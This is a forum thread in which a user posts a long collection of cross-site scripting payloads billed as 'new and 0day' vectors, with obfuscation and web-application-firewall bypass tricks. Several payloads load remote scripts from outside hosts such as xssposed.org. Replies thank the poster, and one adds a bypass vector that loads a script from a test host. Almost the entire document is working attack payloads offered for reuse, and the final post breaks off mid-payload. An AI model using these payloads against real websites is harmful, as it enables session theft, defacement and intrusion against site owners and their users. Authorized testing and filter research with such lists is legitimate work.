New And 0day XSS Vectors collected from everywhere

Your experience of helping website owners
Post Reply
R3NW4
Posts:23
Joined:Thu Nov 26, 2015 4:45 pm
New And 0day XSS Vectors collected from everywhere

Post by R3NW4 » Thu Nov 26, 2015 6:23 pm

HI First follow on twitter @R3NW4
*Updated*

<a/onmousemove=alert('XSSPOSED')//><h1>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>R3NW4 says /XSS/ <!--

"'/>;</style><script>a=eval;b=alert;a(b(/ XSSPOSED/.source));</script>'">

';alert(/XSSPOSED/)//';alert(/XSSPOSED/)//";alert(/XSSPOSED/)//";alert(/XSSPOSED/)//--></sCRipT>">'><sCRipT>alert(/XSSPOSED/)</sCRipT>

'}};">});});})]--></SCRIPT>-</style>-</title>-</BoDy>-<marquee>-<h1>R3NW4</h1>-</marquee>-<svg/onload=alert('XSSPOSED');>;{{'

#prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/XSSPOSED/)>/

\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), 83, 83))RIPT>\">\'><SCRIPT>alert("XSSPOSED")</SCRIPT>

';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/XSSPOSED/)</SCRIPT>=&{}");}alert(6+);function+xss(){//

" onmouseover=alert(/Xssposed/)>R3NW4
"/>>;--></SCRIPT>R3NW4<AuDiO/**/oNLoaDStaRt='(_=/**/confirm/**/(/XSSPOSED/))'/src><!--
'"/>>--><iMg/sRc=/**/%0AoneRRoR=%2bal\u0065rt(/XSSPOSED/)>
'"--></style></script>"'/>><img+src=x onerror=alert(/XSSPOSED/)><h1>R3NW4</h1>
'|alert('XSSPOSED')|'
'*prompt('xssposed')*'
<SCRIPT>alert('XSSPOSED');</SCRIPT>
R3NW4" onfocus=prompt(/XSSPOSED/) autofocus fragment="
""autofocus/onfocus=alert(/XSSposed/)//"
"><sVG/*_*/R3NW4/OnLoaD="window['pr\u006fmp\u0074']/*/*/('XSSPOSED')";/>
r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSSPOSED/)}
0'"><script/0~~~>;alert('XSSPOSED');</script/0~~~>
-->"><img x/src=x /onerror="x-\u0063onfirm('XSSPOSED')"><!--
<VidEo/oNLoaDStaRt=confirm(/XSSPOSED/)+/src>
<BoDy%0AOnpaGeshoW=%2bwindow.prompt(/XSSPOSED/)<!--
<video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(document.domain))>
<body/onload=confirm(String.fromCharCode(88,83,83,80,79,83,69,68))>
<p/%0Aonmouseover%0A=%0Aconfirm(/XSSPOSED/)>R3NW4
<object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4=' /src>
<InpuT/**/onfocus=pr\u006fmpt(/XSSPOSED/)%0Aautofocus>R3NW4
<img src="x:alert" onerror="eval(src%2b'(/XSSPOSED/)')">
<img/src=R3NW4%0A/**/onerror=eval('al'%2b'ert(/XSSPOSED/)')>
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<input type="text" name="foo" value=""autofocus/onfocus=alert(/XSSposed/)//">
<math href="javascript:alert(1)">CLICKME
"'><body/onload=alert('XSSPOSED')//'">
" autofocus onfocus=alert('XSSPOSED') "
'}};alert('XSSPOSED');{{'
<script>alert(navigator.userAgent)</script>
<var onmouseover="prompt(/XSSPOSED/)">R3NW4</var>-KURD
"><h1/onmouseover='alert(/Xssposed/)'>R3NW4
<img src=x:alert(alt) onerror=eval(src) alt=XSSPOSED>
<object data="javascript:alert('XSSPOSED')">
"><--'<script>window.confirm('xssposed')</script> --!>
<isindex type=image src=1 onerror=alert('XSSPOSED')>
R3nw4"><iframe/onload=alert('XSSPOSED')>"><img src=x onerror=prompt('XSSPOSED');>
<script>'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074('\u0031')</script>
<div onmouseover=prompt("/XSSPOSED/")>R3NW4
"><img src=x onerror=window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==');>
<plaintext/onmousemove=prompt(1)>R3NW4
<marquee/onstart=alert('XSSPOSED')>R3NW4
<embed src=javascript:alert('XSSPOSED')>
'"()&%<xps><ScRiPt >prompt('XSSPOSED')</ScRiPt>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<div/onmouseover='alert(/XSSPOSED/)'>AAA
>\" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
"><svg/onload=document.location.href='https://www.xssposed.org'>
"><audio src=x onerror=confirm("XSSPOSED")>
<iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'XSSposed
<img%09onerror=alert('XSSPOSED') src=a>
<i onclick=alert(1)>Click here</i>
<title onpropertychange=javascript:alert('XSS')></title><title title=>
<img src=<b onerror=alert('XSS');>
<img src="x:? title=" onerror=alert(1)//">
<img src="x:gif" onerror="eval('al'%2b'ert(0)')">
<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
data:text/html,<svg/onload=alert('XSSPOSED')>
javascript:"<script>alert(document.domain)</script>"
<a href=[0x0b]" onclick=alert(1)//">click</a>
R3NW4"><a onmouseover%3D"alert('XSSPOSED')">R3NW4
<script/%00%00v%00%00>alert(/R3NW4/)</script>
<b "<script>alert(1)</script>">hola</b>
'"--><*2f*style><*2f*scRipt><scRipt>alert('XSSPOSED')<*2f*scRipt>
/x"-prompt(/XSSPOSED/)-"
'+confirm(/XSSPOSED/)+'
<%tag style=”xss:expression(alert(123))”>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
/R3nw4"><img src=x onerror=prompt('XSSposed')>
'></a></title><bod y onpageshow=prompt(/XSSPOSED/)>
?r3nw4</script><svg/onload=alert(/XSSPOSED/)//r3nw4
R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
\x3cscript src=https://xssposed.org/1.js\x3e\x3c/script\x3e
@R3nw4<script>$='XSSPOSED',alert($)< /script>-r3nw4/
"--> </script><svg/onload=';alert(/XSSPOSED/);'>
%27%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
'"--></style></script>"'/>><img+src=x onerror=alert(/XSSPOSED/)><h1>R3NW4
"<img src=https://xssposed.org/1.js onerror=prompt('XSSPOSED')><
"><h1>R3NW4<script>alert(1)</script>
\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript src\x3Dhttps\x3A\x2F\x2Fxssposed.org\x2F1.js\x3E
"><svg%2Fonload%3Dalert(%2FXSSPOSED%2F)>
<h1>R3NW4<br><br><br><br><img src=x onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
<svg•onload=alert(/XSSPOSED/)>
r3nw4"><svg onload=alert('XSSPOSED')>
"])},alert('XSSPOSED'));(function xss() {//
""});});});alert('XSSPOSED');$('a').each(function(i){$(this).click(function(event){x({y
<svg onload=alert('XSSPOSED')>
"><h1/onmouseover='alert(/Xssposed/)'>XSSPOSED
"+autofocus+onfocus%3D"alert('XSSPOSED')
</script>< img src=x onerror=alert(/XSSPOSED/)><!--
xss"/onmouseover="alert('XSSPosed')
">@r3nw4<svg%2Fonload%3Dalert(%2FXSSPOSED%2F)>
'"><svg/onload=alert(/XSSPOSED/)>
"><img+src=a+onerror=prompt(/XSSposed/)>
r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/XSSPOSED/)></
"/><iframe/onload=prompt(/XSSPOSED/)>
<img src=x onerror=alert(/XSSPOSED/)>
"><img+src%3Dx+onerror%3Dprompt('XSSPOSED')>
" onmouseover=alert(/Xssposed/)>
"onerror=alert(/XSSPOSED/)>
r3nw4-->hacker<svg/onload=alert('XSSPOSED')//
"";<%2Fscript><script>prompt(%2FXSSPOSED%2F)<%2Fscript><"
r3nw4\'); alert("XSSPOSED");//
"><script>setTimeout("alert(/XSSPOSED/)",1000);</script><a x="
<video onerror=alert(1337) </poster>
<input onfocus=alert(1337) </autofocus>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
'"/>></script><script>alert("XSSPOSED")</script>
</script><img src=x onerror=while(true){prompt(/XSSposed/)}>
<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
<script </src="data:,1> (alert)(1337) "">
<script src=data:;base64,YWxlcnQoMTMzNyk=>
</title><script>alert(/XSSPOSED/)</script>
x");$=alert, $('XSSposed');//
'"/>></scr ipt><script>alert("XSSPOSED")</script>
#prettyPhoto[gallery]/1,<a onclick="alert(/XSSPOSED/);">/
"";</script><script>prompt(/XSSPOSED/)</script><"
Last edited by R3NW4 on Wed Feb 17, 2016 11:28 am, edited 1 time in total.

Lewis
Posts:20
Joined:Tue Nov 24, 2015 2:13 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by Lewis » Thu Nov 26, 2015 8:09 pm

ooooooooo; first top quality post on the forum ^_^
:ugeek:

vdvcoder
Posts:16
Joined:Mon Nov 23, 2015 5:29 pm
Contact:

Re: New And 0day XSS Vectors collected from everywhere

Post by vdvcoder » Thu Nov 26, 2015 10:21 pm

welll, thats a nice list. :D thank u

d1m0ck
Posts:28
Joined:Mon Nov 23, 2015 4:54 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by d1m0ck » Fri Nov 27, 2015 9:00 am

Great collection! Add XSS bypass WAF vector is my last report on hackerone.com

WAF <Script>Alert(Document.Domain)</Script>

XSS exploit bypass WAF <script/src=http://mytesthost.com/1.Js>

R3NW4
Posts:23
Joined:Thu Nov 26, 2015 4:45 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by R3NW4 » Fri Dec 04, 2015 7:36 pm

New One:
<script>'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u007

Post Reply

Who is online

Users browsing this forum: No registered users and 2 guests